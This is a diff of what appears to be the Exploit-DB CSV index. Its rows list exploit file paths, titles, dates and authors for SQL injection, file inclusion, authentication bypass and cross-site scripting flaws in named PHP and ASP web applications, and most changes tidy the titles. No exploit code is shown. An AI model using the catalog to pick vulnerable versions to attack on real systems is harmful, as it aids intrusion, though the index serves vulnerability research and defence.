7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
@ -19941,7 +19951,7 @@ id,file,description,date,author,platform,type,port
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Authentication Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0
7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0
7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
@ -20138,7 +20148,7 @@ id,file,description,date,author,platform,type,port
7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0
7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0
7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
@ -20679,7 +20689,7 @@ id,file,description,date,author,platform,type,port
8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0
8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0
8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0
@ -20901,7 +20911,7 @@ id,file,description,date,author,platform,type,port
8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
@ -21477,7 +21487,7 @@ id,file,description,date,author,platform,type,port
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0
@ -21547,7 +21557,7 @@ id,file,description,date,author,platform,type,port
9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0
9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0
9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0
@ -21651,7 +21661,7 @@ id,file,description,date,author,platform,type,port
10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0
10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80
10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80
@ -22002,7 +22012,7 @@ id,file,description,date,author,platform,type,port
10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0
10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0
10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0
10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0
10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0
10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80
@ -22076,9 +22086,9 @@ id,file,description,date,author,platform,type,port
10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0
@ -22360,7 +22370,7 @@ id,file,description,date,author,platform,type,port
11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0
11446,platforms/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps,0
11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
@ -22523,7 +22533,7 @@ id,file,description,date,author,platform,type,port
11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0
11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0
11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0
11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0
11719,platforms/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,php,webapps,0
11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0
11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0
11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0
@ -22738,7 +22748,7 @@ id,file,description,date,author,platform,type,port
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0
12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
@ -22933,7 +22943,7 @@ id,file,description,date,author,platform,type,port
12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0
12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0
12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0
12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0
12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0
12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0
12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0
12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0
@ -23361,7 +23371,7 @@ id,file,description,date,author,platform,type,port
13866,platforms/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0
13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0
13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0
13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0
@ -23797,7 +23807,7 @@ id,file,description,date,author,platform,type,port
14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0
14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps,0
14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0
14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0
14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0
14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0
14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0
14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0
@ -23859,10 +23869,9 @@ id,file,description,date,author,platform,type,port
14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0
14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0
14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0
14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0
14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0
14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0
14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0
14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0
14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0
14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0
14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0
@ -24098,7 +24107,7 @@ id,file,description,date,author,platform,type,port
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0
15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,php,webapps,0
@ -24518,7 +24527,7 @@ id,file,description,date,author,platform,type,port
17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0
17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0
17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0
17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0
@ -25035,10 +25044,10 @@ id,file,description,date,author,platform,type,port
18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0
18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0
18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0
18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,php,webapps,0
18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0
18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0
18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
18208,platforms/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0
18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0
18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
@ -27943,7 +27952,6 @@ id,file,description,date,author,platform,type,port
26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting",2005-08-08,rgod,php,webapps,0
26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0
26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0
26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0
@ -29101,7 +29109,7 @@ id,file,description,date,author,platform,type,port
27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0
27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0
27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0
27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - Connect.INC Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0
27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0
27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0
27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0
27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0
@ -29284,8 +29292,7 @@ id,file,description,date,author,platform,type,port
27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0
27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0
27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0
27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0
@ -29626,11 +29633,11 @@ id,file,description,date,author,platform,type,port
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
